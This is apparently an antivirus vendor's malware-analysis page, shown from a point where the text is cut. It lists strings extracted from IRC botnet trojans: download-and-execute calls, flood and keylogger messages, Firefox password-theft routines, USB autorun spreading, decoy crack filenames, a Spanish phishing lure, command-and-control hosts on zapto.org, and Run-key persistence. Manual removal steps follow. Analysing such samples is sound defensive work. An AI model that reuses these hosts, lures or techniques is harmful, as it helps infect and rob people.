:The folder '%s' does not exist. Do you want to create it?hAnother copy of the '%s' package is already running on your system. You can only run one copy at a time.OThe '%s' package is not compatible with the version of Windows you are running.SThe '%s' package is not compatible with the version of the file: %s on your system.
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
Windows
Operating System
6.00.2900.5512

msconfig.exe_1532_rwx_00350000_0000B000:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s

msconfig.exe_1532_rwx_009F0000_0000B000:

.text
`.rdata
@.data
.reloc
WS2_32.dll
URLDownloadToFileA
urlmon.dll
GetWindowsDirectoryA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
VkKeyScanA
keybd_event
USER32.dll
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
PRIVMSG
pong|cmd.exe###
udp.stop
rndnick
Cerebral botakeylog
The One botspread.start
Skid placed botsregsrvs.exe
Older Botschngnick
[FTP]
[Botkiller] Killing Process "%s", Type: "%s"
explorer.exe
EXPLORER.EXE
winlogon.exe
csrss.exe
WINLOGON.EXE
services.exe
SERVICES.EXE
%s\%s%i%i.exe
%s Downloading File From: %s, To: %s
%s File Successfully Downloaded To: %s
%s Failed To Download File Reason: Insufficient Memory
%s Failed To Download File Reason: Unknown
%s Successfully Executed: %s
%s Failed To Execute File via Create Process Reason: Unknown
%appdata%\lsass.exe
Hola,2012 el fin del mundo ya comprobaron que biene un meteorito y no han dicho nada.aca puedes ver unas imagenes de la nasa de los lugares donde la tierra se esta deteriorando, solo fata un a
o.informate en el siguiente enlace
BeeSwarm.exe
MAPI32.DLL
*.html
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%s:*:Enabled:%s
Software\Microsoft\Windows\CurrentVersion\Run\
%s %s
%s %s "" "TsGh" :%s
%s %s %s
%s %s :%s
%s :%s
ganja%s.exe
%s Updating to: %s
%s Execution Failed!
%s Dowload Failed!
%s Has Been Visited!
Windows Live Messenger
Ganja%s.exe
[Download]: Executed Successfully
[UDP]: Flooding %s, On Port: %d, With Delay of: %d(ms), For: %d(s)
01Starting Flood On %s, On The Fucking Port: %d, For Fucking: %d seconds
[SSYN]: Flooding %s:%s for %s seconds.
NhG.gov
msconfig.exe
WindowsUpdate
Block.exe
s.flood
NICK
JOIN
root2.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverUpdate
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DriverManager
hXXp://lab005.comule.com/do/15082010/test5
[Speedtest]: %d kB/s
Windows Security Alert
new{BoT-%s-%s}%s
{BoT-%s-%s}%s
%d.%d.%d.%d
\google_cache%s.tmp
website=1
\Desktop.ini
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
usbBlock.exe
icon=%SystemRoot%\system32\SHELL32.dll,2
\autorun.inf
11Infected Drive %s

NESbot.exe_612:

.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C   6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C   2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s <%i> out.
%s error: no user at: <%i>
%s invalid slot: <%i>
%s kill: <%d> threads
%s no threads
%s killed thread: <%s>
%s failed kt: <%s>
%s %s already running: <%d>.
%s faild 2 start %s, err: <%d>.
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error: <%d>
%s Failed to create process: "%s", error: <%d>
%s Created process: "%s", PID: <%d>
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error: <%d>
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
userenv.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
%s%%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
winsvc32.exe
DataBlock.exe
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

winsvc32.exe_344:

.text
`.rdata
@.data
VkKeyScanA
keybd_event
EnumWindows
USER32.dll
ole32.dll
OLEAUT32.dll
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
\SonyCam03-2008.zip
SonyCam03-2008.zip
SonyCam%d%d%d%d%d%d%d%d%d%d%d.JPG__VVV.photobucket.com
\temp\syz.tmp
gafgatew.tmp
_023.jpeg-VVV.myspace.com
edonkey2000\incoming\
Windows 2008 Server KeyGen.exe
DeadSpace KeyGen.exe
Half-Life 2 WORKS-ON-STEAM.exe
Left4Dead-STEAM-Online-Crack-WORKS-DECEMBER08.exe
Password Cracker.exe
FTP Cracker.exe
Hotmail Hacker.exe
Hotmail Cracker.exe
Norton Anti-Virus 2008 Enterprise Crack.exe
Kaspersky 2009 Full Suite Crack.exe
Microsoft Visual C   6 KeyGen.exe
Microsoft Visual Basic 6 KeyGen.exe
Microsoft Visual Studio 6 KeyGen.exe
Microsoft Visual Studio 2008 KeyGen.exe
Microsoft Visual Basic 2008 KeyGen.exe
Microsoft Visual C   2008 KeyGen.exe
MSN Live Password Cracker.exe
AOL Instant Messenger (AIM) Cracker.exe
AOL Triton Cracker.exe
ICQ Account Cracker.exe
AOL Password Cracker.exe
Counter-Strike KeyGen.exe
Counter-Strike Source KeyGen.exe
DivX Pro KeyGen.exe
RuneScape Cracker.exe
RuneScape Gold Exploit.exe
Windows XP Keygen
Windows XP Crack.exe
Windows Vista Keygen
Widnows Vista Crack.exe
Kaspersky Crck.exe
Kaspersky Keygen.exe
WOW Account Cracker.exe
Project 7 Private 4.8.exe
Virus Generator.exe
Virus Maker.exe
Nod32 Crack.exe
Nod32 Keygen.exe
Steam Account Stealer.exe
Myspace Cracker.exe
Myspace Bruteforce.exe
Myspace Attack.exe
Limewire Pro Downloader.exe
Tcpip Patch.exe
MSN Hacker 2008.exe
MSN Hacker 2009.exe
AOL Hacker 2008.exe
AOL Hacker 2009.exe
YIM HAcker 2008.exe
YIM HAcker 2009.exe
PhotoShop Keygen.exe
Adobe Photoshop Keygen.exe
Adobe Photoshop Crack.exe
Photoshop Crack.exe
Adobe Keygen.exe
Adobe Photoshop CS3 Keygen.exe
Adobe Photoshop CS4 KeyGen.exe
RuneScape 2008 - Newest Exploits.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
%s\%s
keygen
KeyGen.exe
shlwapi.dll
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
ahoo] - Msg & File Sent To: %s Contacts.
%s%d%d%d.JPG.scr
%s%d%d%d
KeyGen
mozcrt19.dll
nspr4.dll
plds4.dll
plc4.dll
nssutil3.dll
sqlite3.dll
softokn3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
[Pstore-FF] %s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
Application Data\Mozilla\Firefox
\profiles.ini
SOFTWARE\Mozilla\Mozilla Firefox
signons1.txt
signons2.txt
signons3.txt
pstorec.dll
%s %s %s:%s
http:/
https:/
kWindows Security Alert
SbieDll.dll
TCPView - Sysinternals: VVV.sysinternals.com
Process Monitor - Sysinternals: VVV.sysinternals.com
Process Explorer - Sysinternals: VVV.sysinternals.com
File Monitor - Sysinternals: VVV.sysinternals.com
SwitchSniffer v1.3.2.0 Registered
SwitchSniffer v1.3.2.0 UnRegistered
Auto Start and Process Viewer : VVV.konradp.com
Remote Process Viewer for Windows Networks
Process Heap Viewer - VVV.SecurityXploded.com
KERNEL32.DLL
TASKMGR.EXE
%s gained access..
%s did not break in..
: %s!%s@%s (PM: "%s")
%s fail by: %s!%s@%s (tried: %s)
%s %s out.
%s <%i> out.
%s error: no user at: <%i>
%s invalid slot: <%i>
%s kill: <%d> threads
%s no threads
%s killed thread: <%s>
%s failed kt: <%s>
%s %s already running: <%d>.
%s faild 2 start %s, err: <%d>.
%s status: %s.
uptime: %s,
for: %s.
%s Bot installed on: %s.
sn] Msg & File Sent To %d Contacts.
by: %s!%s@%s
%s Advapi.dll Failed
%s PStore.dll Failed.
%s Main thread.
%s RuC.
%s mis paramter[s].
%s -SECURE-LOCKDOWN-INITIATED- You THOUGHT you had me :)
%s spreading disabled.
%s Thread Disabled.
FIREFOX Threads
%s ddosing %s:%s/%s secs.
%s unable to start ddos, error: %s
%s %s
%s seeding!
%s unable to download file
%s wget: %s location: %s.
%seraseme_%d%d%d%d%d.exe
%s Downloading update from: %s to: %s.
%s updating from %s
%s Couldn't open file for writing: %s.
%s File download: %.1fKB to: %s @ %.1fKB/sec.
%s Couldn't parse path, error: <%d>
%s Failed to create process: "%s", error: <%d>
%s Created process: "%s", PID: <%d>
%s Process Finished: "%s", Total Running Time: %s.
%s Update failed: Error executing file: %s.
%s Bad URL or DNS Error, error: <%d>
Ping Timeout? (%d-%d)%d/%d
PASS %s
NICK %s
USER NESv5 * 0 :%s
QUIT %s
JOIN
PRIVMSG
NICK
PONG %s
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
MODE %s %s
MODE %s %s %s
Torrent 1.8.1
%d.%d.%d.%d
kernel32.dll
user32.dll
advapi32.dll
RegEnumKeyExA
ws2_32.dll
wininet.dll
HttpOpenRequestA
HttpSendRequestA
FtpGetFileA
FtpPutFileA
InternetOpenUrlA
InternetCrackUrlA
Mozilla/4.0 (compatible)
netapi32.dll
dnsapi.dll
iphlpapi.dll
GetTcpTable
GetUdpTable
mpr.dll
shell32.dll
ShellExecuteA
odbc32.dll
SQLDriverConnect
SQLSetEnvAttr
SQLExecDirect
SQLAllocHandle
SQLFreeHandle
SQLDisconnect
userenv.dll
psapi.dll
hXXp://checkip.dyndns.org
hXXp://VVV.whatismyip.com
%s%%s
%s!%s@%s
%s fail nigga. (%s!%s@%s) password: %s.
%s too many users logged in.
%s logged in.
NESbot %s thread stopped. (%d thread(s) stopped.)
NESbot No %s thread found.
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 0.0.0.0>nul
if exist "%s" goto Repeat
winsvc32.exe
DataBlock.exe
nhg24.zapto.org
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
192.168.11.128


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Cyanide.exe:348
    Cyanide.exe:1972
    winsvc32.exe:344
    Ganja145.exe:1436
    NESbot.exe:612
    NESbot.exe:1388

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\msn[1].exe (15430 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\google_cache2.tmp (9 bytes)
    %Documents and Settings%\%current user%\Application Data\msconfig.exe (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cyanide.exe (60 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\NESbot.exe (132 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\hhh.exe (4984 bytes)
    %WinDir%\winsvc32.exe (601 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "WindowsUpdate" = "%Documents and Settings%\%current user%\Application Data\msconfig.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "winsvc32" = "winsvc32.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now